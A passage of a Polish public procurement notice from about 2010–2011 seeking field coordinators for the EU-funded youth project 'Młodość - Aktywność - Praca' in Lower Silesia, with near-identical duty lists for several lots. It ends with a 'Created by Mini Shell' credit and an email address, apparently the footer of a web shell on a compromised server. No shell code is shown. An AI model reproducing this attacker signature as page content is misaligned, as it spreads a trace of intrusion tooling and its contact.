c)Współpraca z Kierownikiem Projektu oraz Działem Wdrażania Projektów Europejskich 
i Współpracy Międzynarodowej Dolnośląskiej Wojewódzkiej Komendy Ochotniczych Hufców Pracy w zakresie realizacji projektu, a także udzielanie im niezbędnych odpowiedzi 
i wyjaśnień.
d)udział w Komisjach rekrutacyjnych, negocjacyjnych i przetargowych.
e)Zrekrutowanie, zgodnie z zapisami zawartymi we wniosku o dofinansowanie, odpowiedniej ilości uczestników spełniających kryteria kwalifikujące do wzięcia udziału w projekcie oraz zatwierdzenie Deklaracji uczestnictwa w Projekcie. 
f)Bieżąca obsługa projektu np. sporządzanie harmonogramu zajęć, dbanie o sprawny przebieg informacji, kontrola list obecności i posiłków, bieżąca kontrola frekwencji na szkoleniach,   prowadzenie dokumentacji projektowej, kontrola podmiotów zewnętrznych realizujących dane zadanie, nadzór,  wydatkowanie i akceptowanie płatności przewidzianych dla danego regionu wg budżetu, etc.
g)Monitorowanie prawidłowego wydatkowania  środków finansowych zgodnie z Preliminarzem Projektu,
h)Sporządzanie informacji miesięcznej - tabeli monitorującej realizacje projektu, 
i)Przygotowywanie informacji ustnych i pisemnych dotyczących stanu realizacji projektu 
na żądanie Zleceniodawcy, w tym przygotowanie sprawozdań merytorycznych dotyczących realizacji projektu oraz stanu zapotrzebowania i wydatkowania środków finansowych.
j)Opracowywanie raportów i innych dokumentów w terminie i według wzoru określonego               w umowie nr UDA-POKL.07.02.01-02-004/09-00 dnia 15 marca 2010 r. ( m.in. wniosku 
o płatność oraz dokumentacji rozliczeniowej wniosku o płatność ),
k)Kontrolowanie i opisywanie pod względem merytorycznym dokumentów finansowo- księgowych dotyczących projektu Młodość- Aktywność- Praca.
l)Reprezentowanie projektu Młodość- Aktywność- Praca w kontaktach zewnętrznych.
m)Administrowanie sprzętem zakupionym w ramach realizacji projektu.
n)Promocja projektu zgodna z wytycznymi zawartymi w dokumentach programowych POKL,
o)Właściwa dystrybucja dostarczonych przez Zamawiającego materiałów promocyjnych, 
p)Sporządzanie formularza PEFS (i przekazywanie go z zachowaniem procedur bezpieczeństwa Kierownikowi Projektu) oraz wszystkich dokumentów z tym związanych.
q)Monitoring i ewaluacja projektu, w tym przeprowadzenie ewaluacji ex-post i zebranie stosownych dokumentów w 6 miesięcy po zakończeniu projektu,
r)Wsparcie i motywowanie uczestników projektu do końca ich uczestnictwa w projekcie. 
s)Wykonywanie innych czynności wynikających z obowiązujących przepisów 
i poleceń Kierownika.
t)Wykonawca zobowiązany będzie do przestrzegania zapisów Ustawy o Ochronie Danych Osobowych (Dz. U. 2002r. nr 101, poz. 926, tekst jednolity
8.Zamawiający nie będzie ponosił kosztów związanych z dojazdem do miejsca realizacji zadania oraz kosztów diet, noclegów, rozmów telefonicznych itd. Wykonawca ponosi wszystkie koszty realizacji zadania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Świadczenie usług koordynatora terenowego projektu regionalnego Młodość - Aktywność - Praca współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego z podziałem na 5 zadań. CPV 79421000-1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Świadczenie usług koordynatora terenowego projektu regionalnego Młodość - Aktywność - Praca współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego z podziałem na 5 zadań. CPV 79421000-1. 
2.Termin realizacji zamówienia: od dnia podpisania umowy do 31.05.2011r. 
3.Miejsce realizacji zadań: 
a)Zadanie nr 1 - we Wrocławiu,
b)Zadanie nr 2 - w Legnicy,
c)Zadanie nr 3 -  w Jeleniej Górze,
d)Zadanie nr 4 - w Wołowie,
e)Zadanie nr 5 - w Wałbrzychu i Świdnicy. 
4.Zajęcia w ramach projektu odbywać będą się we: Wrocławiu (40 osób), Legnicy (20 osób), Jeleniej Górze (20 osób), Wołowie (30 osób), Wałbrzychu i Świdnicy (20 osób). Wałbrzych                   i Świdnicy podlegają jednemu koordynatorowi terenowemu. Łącznie w projekcie weźmie udział 130 osób, w tym 39 osób niepełnosprawnych w stopniu lekkim bądź umiarkowanym.
5.Zajęcia w ramach projektu mogą odbywać się od poniedziałku do niedzieli w godzinach 8.00-20.00 z przerwą 15 minut po min. 1 godzinie zajęć.
6. Koordynatorzy terenowi projektu będą podlegać bezpośrednio Kierownikowi Projektu i będą  przed Nim odpowiedzialni za wykonywanie swoich zadań.
7.Zakres czynności Koordynatora dla zadania nr 1, 2, 3, 4, 5:
a)Koordynowanie i monitoring przebiegu prac poszczególnych wykonawców w projekcie działających na jego terenie (w tym: firm, specjalistów, wykładowców, asystentów                            i opiekunów, etc.), w celu zrealizowania projektu zgodnie  z obowiązującą w ramach POKL dokumentacją, obowiązującymi przepisami prawa, umową o dofinansowanie projektu, zaplanowanym budżetem oraz w zaplanowanym w harmonogramie projektu terminie oraz w sposób zmierzający do osiągnięcia  założonych we wniosku o dofinansowanie rezultatów                  i efektów. 
b)Organizacja spotkań roboczych z udziałem podmiotów zaangażowanych w realizację poszczególnych zadań.
c)Współpraca z Kierownikiem Projektu oraz Działem Wdrażania Projektów Europejskich 
i Współpracy Międzynarodowej Dolnośląskiej Wojewódzkiej Komendy Ochotniczych Hufców Pracy w zakresie realizacji projektu, a także udzielanie im niezbędnych odpowiedzi 
i wyjaśnień.
d)udział w Komisjach rekrutacyjnych, negocjacyjnych i przetargowych.
e)Zrekrutowanie, zgodnie z zapisami zawartymi we wniosku o dofinansowanie, odpowiedniej ilości uczestników spełniających kryteria kwalifikujące do wzięcia udziału w projekcie oraz zatwierdzenie Deklaracji uczestnictwa w Projekcie. 
f)Bieżąca obsługa projektu np. sporządzanie harmonogramu zajęć, dbanie o sprawny przebieg informacji, kontrola list obecności i posiłków, bieżąca kontrola frekwencji na szkoleniach,   prowadzenie dokumentacji projektowej, kontrola podmiotów zewnętrznych realizujących dane zadanie, nadzór,  wydatkowanie i akceptowanie płatności przewidzianych dla danego regionu wg budżetu, etc.
g)Monitorowanie prawidłowego wydatkowania  środków finansowych zgodnie z Preliminarzem Projektu,
h)Sporządzanie informacji miesięcznej - tabeli monitorującej realizacje projektu, 
i)Przygotowywanie informacji ustnych i pisemnych dotyczących stanu realizacji projektu 
na żądanie Zleceniodawcy, w tym przygotowanie sprawozdań merytorycznych dotyczących realizacji projektu oraz stanu zapotrzebowania i wydatkowania środków finansowych.
j)Opracowywanie raportów i innych dokumentów w terminie i według wzoru określonego               w umowie nr UDA-POKL.07.02.01-02-004/09-00 dnia 15 marca 2010 r. ( m.in. wniosku 
o płatność oraz dokumentacji rozliczeniowej wniosku o płatność ),
k)Kontrolowanie i opisywanie pod względem merytorycznym dokumentów finansowo- księgowych dotyczących projektu Młodość- Aktywność- Praca.
l)Reprezentowanie projektu Młodość- Aktywność- Praca w kontaktach zewnętrznych.
m)Administrowanie sprzętem zakupionym w ramach realizacji projektu.
n)Promocja projektu zgodna z wytycznymi zawartymi w dokumentach programowych POKL,
o)Właściwa dystrybucja dostarczonych przez Zamawiającego materiałów promocyjnych, 
p)Sporządzanie formularza PEFS (i przekazywanie go z zachowaniem procedur bezpieczeństwa Kierownikowi Projektu) oraz wszystkich dokumentów z tym związanych.
q)Monitoring i ewaluacja projektu, w tym przeprowadzenie ewaluacji ex-post i zebranie stosownych dokumentów w 6 miesięcy po zakończeniu projektu,
r)Wsparcie i motywowanie uczestników projektu do końca ich uczestnictwa w projekcie. 
s)Wykonywanie innych czynności wynikających z obowiązujących przepisów 
i poleceń Kierownika.
t)Wykonawca zobowiązany będzie do przestrzegania zapisów Ustawy o Ochronie Danych Osobowych (Dz. U. 2002r. nr 101, poz. 926, tekst jednolity
8.Zamawiający nie będzie ponosił kosztów związanych z dojazdem do miejsca realizacji zadania oraz kosztów diet, noclegów, rozmów telefonicznych itd. Wykonawca ponosi wszystkie koszty realizacji zadania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Świadczenie usług koordynatora terenowego projektu regionalnego Młodość - Aktywność - Praca współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego z podziałem na 5 zadań. CPV 79421000-1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Świadczenie usług koordynatora terenowego projektu regionalnego Młodość - Aktywność - Praca współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego z podziałem na 5 zadań. CPV 79421000-1. 
2.Termin realizacji zamówienia: od dnia podpisania umowy do 31.05.2011r. 
3.Miejsce realizacji zadań: 
a)Zadanie nr 1 - we Wrocławiu,
b)Zadanie nr 2 - w Legnicy,
c)Zadanie nr 3 -  w Jeleniej Górze,
d)Zadanie nr 4 - w Wołowie,
e)Zadanie nr 5 - w Wałbrzychu i Świdnicy. 
4.Zajęcia w ramach projektu odbywać będą się we: Wrocławiu (40 osób), Legnicy (20 osób), Jeleniej Górze (20 osób), Wołowie (30 osób), Wałbrzychu i Świdnicy (20 osób). Wałbrzych                   i Świdnicy podlegają jednemu koordynatorowi terenowemu. Łącznie w projekcie weźmie udział 130 osób, w tym 39 osób niepełnosprawnych w stopniu lekkim bądź umiarkowanym.
5.Zajęcia w ramach projektu mogą odbywać się od poniedziałku do niedzieli w godzinach 8.00-20.00 z przerwą 15 minut po min. 1 godzinie zajęć.
6. Koordynatorzy terenowi projektu będą podlegać bezpośrednio Kierownikowi Projektu i będą  przed Nim odpowiedzialni za wykonywanie swoich zadań.
7.Zakres czynności Koordynatora dla zadania nr 1, 2, 3, 4, 5:
a)Koordynowanie i monitoring przebiegu prac poszczególnych wykonawców w projekcie działających na jego terenie (w tym: firm, specjalistów, wykładowców, asystentów                            i opiekunów, etc.), w celu zrealizowania projektu zgodnie  z obowiązującą w ramach POKL dokumentacją, obowiązującymi przepisami prawa, umową o dofinansowanie projektu, zaplanowanym budżetem oraz w zaplanowanym w harmonogramie projektu terminie oraz w sposób zmierzający do osiągnięcia  założonych we wniosku o dofinansowanie rezultatów                  i efektów. 
b)Organizacja spotkań roboczych z udziałem podmiotów zaangażowanych w realizację poszczególnych zadań.
c)Współpraca z Kierownikiem Projektu oraz Działem Wdrażania Projektów Europejskich 
i Współpracy Międzynarodowej Dolnośląskiej Wojewódzkiej Komendy Ochotniczych Hufców Pracy w zakresie realizacji projektu, a także udzielanie im niezbędnych odpowiedzi 
i wyjaśnień.
d)udział w Komisjach rekrutacyjnych, negocjacyjnych i przetargowych.
e)Zrekrutowanie, zgodnie z zapisami zawartymi we wniosku o dofinansowanie, odpowiedniej ilości uczestników spełniających kryteria kwalifikujące do wzięcia udziału w projekcie oraz zatwierdzenie Deklaracji uczestnictwa w Projekcie. 
f)Bieżąca obsługa projektu np. sporządzanie harmonogramu zajęć, dbanie o sprawny przebieg informacji, kontrola list obecności i posiłków, bieżąca kontrola frekwencji na szkoleniach,   prowadzenie dokumentacji projektowej, kontrola podmiotów zewnętrznych realizujących dane zadanie, nadzór,  wydatkowanie i akceptowanie płatności przewidzianych dla danego regionu wg budżetu, etc.
g)Monitorowanie prawidłowego wydatkowania  środków finansowych zgodnie z Preliminarzem Projektu,
h)Sporządzanie informacji miesięcznej - tabeli monitorującej realizacje projektu, 
i)Przygotowywanie informacji ustnych i pisemnych dotyczących stanu realizacji projektu 
na żądanie Zleceniodawcy, w tym przygotowanie sprawozdań merytorycznych dotyczących realizacji projektu oraz stanu zapotrzebowania i wydatkowania środków finansowych.
j)Opracowywanie raportów i innych dokumentów w terminie i według wzoru określonego               w umowie nr UDA-POKL.07.02.01-02-004/09-00 dnia 15 marca 2010 r. ( m.in. wniosku 
o płatność oraz dokumentacji rozliczeniowej wniosku o płatność ),
k)Kontrolowanie i opisywanie pod względem merytorycznym dokumentów finansowo- księgowych dotyczących projektu Młodość- Aktywność- Praca.
l)Reprezentowanie projektu Młodość- Aktywność- Praca w kontaktach zewnętrznych.
m)Administrowanie sprzętem zakupionym w ramach realizacji projektu.
n)Promocja projektu zgodna z wytycznymi zawartymi w dokumentach programowych POKL,
o)Właściwa dystrybucja dostarczonych przez Zamawiającego materiałów promocyjnych, 
p)Sporządzanie formularza PEFS (i przekazywanie go z zachowaniem procedur bezpieczeństwa Kierownikowi Projektu) oraz wszystkich dokumentów z tym związanych.
q)Monitoring i ewaluacja projektu, w tym przeprowadzenie ewaluacji ex-post i zebranie stosownych dokumentów w 6 miesięcy po zakończeniu projektu,
r)Wsparcie i motywowanie uczestników projektu do końca ich uczestnictwa w projekcie. 
s)Wykonywanie innych czynności wynikających z obowiązujących przepisów 
i poleceń Kierownika.
t)Wykonawca zobowiązany będzie do przestrzegania zapisów Ustawy o Ochronie Danych Osobowych (Dz. U. 2002r. nr 101, poz. 926, tekst jednolity
8.Zamawiający nie będzie ponosił kosztów związanych z dojazdem do miejsca realizacji zadania oraz kosztów diet, noclegów, rozmów telefonicznych itd. Wykonawca ponosi wszystkie koszty realizacji zadania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Świadczenie usług koordynatora terenowego projektu regionalnego Młodość - Aktywność - Praca współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego z podziałem na 5 zadań. CPV 79421000-1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Świadczenie usług koordynatora terenowego projektu regionalnego Młodość - Aktywność - Praca współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego z podziałem na 5 zadań. CPV 79421000-1. 
2.Termin realizacji zamówienia: od dnia podpisania umowy do 31.05.2011r. 
3.Miejsce realizacji zadań: 
a)Zadanie nr 1 - we Wrocławiu,
b)Zadanie nr 2 - w Legnicy,
c)Zadanie nr 3 -  w Jeleniej Górze,
d)Zadanie nr 4 - w Wołowie,
e)Zadanie nr 5 - w Wałbrzychu i Świdnicy. 
4.Zajęcia w ramach projektu odbywać będą się we: Wrocławiu (40 osób), Legnicy (20 osób), Jeleniej Górze (20 osób), Wołowie (30 osób), Wałbrzychu i Świdnicy (20 osób). Wałbrzych                   i Świdnicy podlegają jednemu koordynatorowi terenowemu. Łącznie w projekcie weźmie udział 130 osób, w tym 39 osób niepełnosprawnych w stopniu lekkim bądź umiarkowanym.
5.Zajęcia w ramach projektu mogą odbywać się od poniedziałku do niedzieli w godzinach 8.00-20.00 z przerwą 15 minut po min. 1 godzinie zajęć.
6. Koordynatorzy terenowi projektu będą podlegać bezpośrednio Kierownikowi Projektu i będą  przed Nim odpowiedzialni za wykonywanie swoich zadań.
7.Zakres czynności Koordynatora dla zadania nr 1, 2, 3, 4, 5:
a)Koordynowanie i monitoring przebiegu prac poszczególnych wykonawców w projekcie działających na jego terenie (w tym: firm, specjalistów, wykładowców, asystentów                            i opiekunów, etc.), w celu zrealizowania projektu zgodnie  z obowiązującą w ramach POKL dokumentacją, obowiązującymi przepisami prawa, umową o dofinansowanie projektu, zaplanowanym budżetem oraz w zaplanowanym w harmonogramie projektu terminie oraz w sposób zmierzający do osiągnięcia  założonych we wniosku o dofinansowanie rezultatów                  i efektów. 
b)Organizacja spotkań roboczych z udziałem podmiotów zaangażowanych w realizację poszczególnych zadań.
c)Współpraca z Kierownikiem Projektu oraz Działem Wdrażania Projektów Europejskich 
i Współpracy Międzynarodowej Dolnośląskiej Wojewódzkiej Komendy Ochotniczych Hufców Pracy w zakresie realizacji projektu, a także udzielanie im niezbędnych odpowiedzi 
i wyjaśnień.
d)udział w Komisjach rekrutacyjnych, negocjacyjnych i przetargowych.
e)Zrekrutowanie, zgodnie z zapisami zawartymi we wniosku o dofinansowanie, odpowiedniej ilości uczestników spełniających kryteria kwalifikujące do wzięcia udziału w projekcie oraz zatwierdzenie Deklaracji uczestnictwa w Projekcie. 
f)Bieżąca obsługa projektu np. sporządzanie harmonogramu zajęć, dbanie o sprawny przebieg informacji, kontrola list obecności i posiłków, bieżąca kontrola frekwencji na szkoleniach,   prowadzenie dokumentacji projektowej, kontrola podmiotów zewnętrznych realizujących dane zadanie, nadzór,  wydatkowanie i akceptowanie płatności przewidzianych dla danego regionu wg budżetu, etc.
g)Monitorowanie prawidłowego wydatkowania  środków finansowych zgodnie z Preliminarzem Projektu,
h)Sporządzanie informacji miesięcznej - tabeli monitorującej realizacje projektu, 
i)Przygotowywanie informacji ustnych i pisemnych dotyczących stanu realizacji projektu 
na żądanie Zleceniodawcy, w tym przygotowanie sprawozdań merytorycznych dotyczących realizacji projektu oraz stanu zapotrzebowania i wydatkowania środków finansowych.
j)Opracowywanie raportów i innych dokumentów w terminie i według wzoru określonego               w umowie nr UDA-POKL.07.02.01-02-004/09-00 dnia 15 marca 2010 r. ( m.in. wniosku 
o płatność oraz dokumentacji rozliczeniowej wniosku o płatność ),
k)Kontrolowanie i opisywanie pod względem merytorycznym dokumentów finansowo- księgowych dotyczących projektu Młodość- Aktywność- Praca.
l)Reprezentowanie projektu Młodość- Aktywność- Praca w kontaktach zewnętrznych.
m)Administrowanie sprzętem zakupionym w ramach realizacji projektu.
n)Promocja projektu zgodna z wytycznymi zawartymi w dokumentach programowych POKL,
o)Właściwa dystrybucja dostarczonych przez Zamawiającego materiałów promocyjnych, 
p)Sporządzanie formularza PEFS (i przekazywanie go z zachowaniem procedur bezpieczeństwa Kierownikowi Projektu) oraz wszystkich dokumentów z tym związanych.
q)Monitoring i ewaluacja projektu, w tym przeprowadzenie ewaluacji ex-post i zebranie stosownych dokumentów w 6 miesięcy po zakończeniu projektu,
r)Wsparcie i motywowanie uczestników projektu do końca ich uczestnictwa w projekcie. 
s)Wykonywanie innych czynności wynikających z obowiązujących przepisów 
i poleceń Kierownika.
t)Wykonawca zobowiązany będzie do przestrzegania zapisów Ustawy o Ochronie Danych Osobowych (Dz. U. 2002r. nr 101, poz. 926, tekst jednolity
8.Zamawiający nie będzie ponosił kosztów związanych z dojazdem do miejsca realizacji zadania oraz kosztów diet, noclegów, rozmów telefonicznych itd. Wykonawca ponosi wszystkie koszty realizacji zadania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com